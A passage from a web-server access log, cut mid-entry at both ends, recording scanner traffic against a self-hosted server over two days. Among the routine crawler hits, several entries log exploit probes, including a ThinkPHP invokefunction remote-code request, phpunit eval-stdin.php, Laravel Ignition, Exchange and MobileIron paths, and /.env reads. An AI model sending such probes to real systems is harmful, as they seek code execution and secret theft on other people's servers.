192.241.223.151] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Jul/2021:01:53:29 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:01:53:29 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:02:48:47 +0000] 444 - GET https 64.22.21.87 "/" [Client 162.142.125.37] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:02:48:51 +0000] 400 - GET http 64.22.21.87 "/" [Client 162.142.125.37] [Length 252] [Gzip -] "-" "-" [29/Jul/2021:02:48:51 +0000] 400 - GET http 64.22.21.87 "/" [Client 162.142.125.37] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [29/Jul/2021:02:49:53 +0000] 444 - GET https 64.22.21.87 "/" [Client 184.105.247.254] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:04:43:02 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Jul/2021:05:17:22 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [29/Jul/2021:07:24:21 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:07:24:21 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:07:39:43 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.211.49] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Jul/2021:07:51:22 +0000] 400 - GET http 64.22.21.87 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [29/Jul/2021:08:43:06 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [29/Jul/2021:08:43:47 +0000] 400 - GET http 64.22.21.87 "/config/getuser?index=0" [Client 199.19.224.165] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [29/Jul/2021:08:55:55 +0000] 444 - GET https 64.22.21.87 "/" [Client 185.142.236.40] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [29/Jul/2021:08:55:56 +0000] 444 - GET https 64.22.21.87 "/" [Client 185.142.236.40] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [29/Jul/2021:08:55:59 +0000] 444 - GET https 64.22.21.87 "/" [Client 185.142.236.40] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [29/Jul/2021:08:57:12 +0000] 400 - - https localhost "-" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:08:57:12 +0000] 400 - - https localhost "-" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:08:57:14 +0000] 400 - - https localhost "-" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:08:57:19 +0000] 444 - GET https 64.22.21.87 "/robots.txt" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:08:57:21 +0000] 444 - GET https 64.22.21.87 "/sitemap.xml" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:08:57:22 +0000] 444 - GET https 64.22.21.87 "/.well-known/security.txt" [Client 185.142.236.40] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:08:58:50 +0000] 444 - GET https 64.22.21.87 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [29/Jul/2021:09:30:55 +0000] 444 - GET https 64.22.21.87 "/owa/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Jul/2021:09:48:48 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.17] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Jul/2021:09:58:35 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:09:58:35 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:09:58:36 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:09:58:38 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:09:58:38 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:09:58:40 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:09:58:40 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [29/Jul/2021:09:58:40 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:09:58:41 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:09:58:41 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:09:58:43 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Jul/2021:10:10:12 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:10:10:12 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:10:53:15 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Jul/2021:11:28:02 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:11:28:03 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:12:58:57 +0000] 444 - GET https 64.22.21.87 "/" [Client 34.65.68.119] [Length 0] [Gzip -] "Mozilla/5.0" "-" [29/Jul/2021:13:18:19 +0000] 444 - GET https 64.22.21.87 "/solr/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Jul/2021:14:18:29 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:14:18:29 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:15:21:27 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:15:21:28 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [29/Jul/2021:18:23:05 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.218.212] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Jul/2021:18:37:05 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Jul/2021:18:55:41 +0000] 444 - GET https 64.22.21.87 "/" [Client 68.183.92.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2393.94" "-" [29/Jul/2021:20:03:05 +0000] 444 - GET https 64.22.21.87 "/" [Client 23.129.64.159] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [29/Jul/2021:20:03:10 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.143] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:20:03:20 +0000] 400 - - https localhost "-" [Client 23.129.64.133] [Length 154] [Gzip -] "-" "-" [29/Jul/2021:20:03:32 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.139] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:20:21:42 +0000] 444 - GET https 64.22.21.87 "/phpmyadmin/print.css" [Client 176.111.173.206] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" "-" [29/Jul/2021:20:56:22 +0000] 400 - HEAD http localhost "/" [Client 188.166.217.221] [Length 0] [Gzip -] "-" "-" [29/Jul/2021:20:56:28 +0000] 400 - GET http 64.22.21.87 "/system_api.php" [Client 188.166.217.221] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:56:29 +0000] 444 - GET https 64.22.21.87 "/system_api.php" [Client 188.166.217.221] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:56:31 +0000] 400 - GET http 64.22.21.87 "/c/version.js" [Client 188.166.217.221] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:56:32 +0000] 444 - GET https 64.22.21.87 "/c/version.js" [Client 188.166.217.221] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:56:33 +0000] 400 - GET http 64.22.21.87 "/streaming/clients_live.php" [Client 188.166.217.221] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:56:34 +0000] 444 - GET https 64.22.21.87 "/streaming/clients_live.php" [Client 188.166.217.221] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:56:36 +0000] 400 - GET http 64.22.21.87 "/stalker_portal/c/version.js" [Client 188.166.217.221] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:56:37 +0000] 444 - GET https 64.22.21.87 "/stalker_portal/c/version.js" [Client 188.166.217.221] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:56:38 +0000] 400 - GET http 64.22.21.87 "/stream/live.php" [Client 188.166.217.221] [Length 252] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [29/Jul/2021:20:56:39 +0000] 444 - GET https 64.22.21.87 "/stream/live.php" [Client 188.166.217.221] [Length 0] [Gzip -] "VLC/3.0.8 LibVLC/3.0.8" "-" [29/Jul/2021:20:56:40 +0000] 400 - GET http 64.22.21.87 "/flu/403.html" [Client 188.166.217.221] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:56:41 +0000] 444 - GET https 64.22.21.87 "/flu/403.html" [Client 188.166.217.221] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [29/Jul/2021:20:57:06 +0000] 444 - GET https 64.22.21.87 "/.env" [Client 144.168.243.186] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [29/Jul/2021:21:13:03 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Jul/2021:21:13:03 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Jul/2021:21:13:03 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Jul/2021:21:13:03 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Jul/2021:21:13:03 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Jul/2021:21:13:03 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Jul/2021:22:19:59 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Jul/2021:22:51:51 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.210] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:00:02:50 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:00:02:51 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:01:05:28 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:01:05:28 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:01:54:26 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 144.86.173.153] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [30/Jul/2021:02:28:42 +0000] 444 - GET https 64.22.21.87 "/" [Client 184.105.247.252] [Length 0] [Gzip -] "-" "-" [30/Jul/2021:03:59:50 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.33.83.200] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [30/Jul/2021:05:54:26 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:26 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:27 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:28 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:29 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:32 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:32 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:32 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:33 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:34 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Jul/2021:05:54:35 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [30/Jul/2021:05:56:02 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Jul/2021:06:01:06 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:06:01:06 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:07:38:13 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:07:38:14 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:07:44:42 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.216.244] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:08:17:51 +0000] 444 - GET https 64.22.21.87 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [30/Jul/2021:08:21:38 +0000] 400 - GET http 64.22.21.87 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:08:23:13 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:08:23:14 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:08:51:57 +0000] 444 - GET https 64.22.21.87 "/" [Client 83.41.123.192] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:09:01:06 +0000] 444 - GET https 64.22.21.87 "/" [Client 23.95.242.214] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" [30/Jul/2021:09:49:47 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.214.204] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Jul/2021:10:02:15 +0000] 444 - GET https 64.22.21.87 "/pma/print.css" [Client 176.111.173.206] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" "-" [30/Jul/2021:11:12:49 +0000] 444 - GET https 64.22.21.87 "/" [Client 74.120.14.54] [Length 0] [Gzip -] "-" "-" [30/Jul/2021:11:12:50 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.54] [Length 252] [Gzip -] "-" "-" [30/Jul/2021:11:12:50 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.54] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [30/Jul/2021:11:26:11 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [30/Jul/2021:11:55:21 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [30/Jul/2021:11:55:21 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 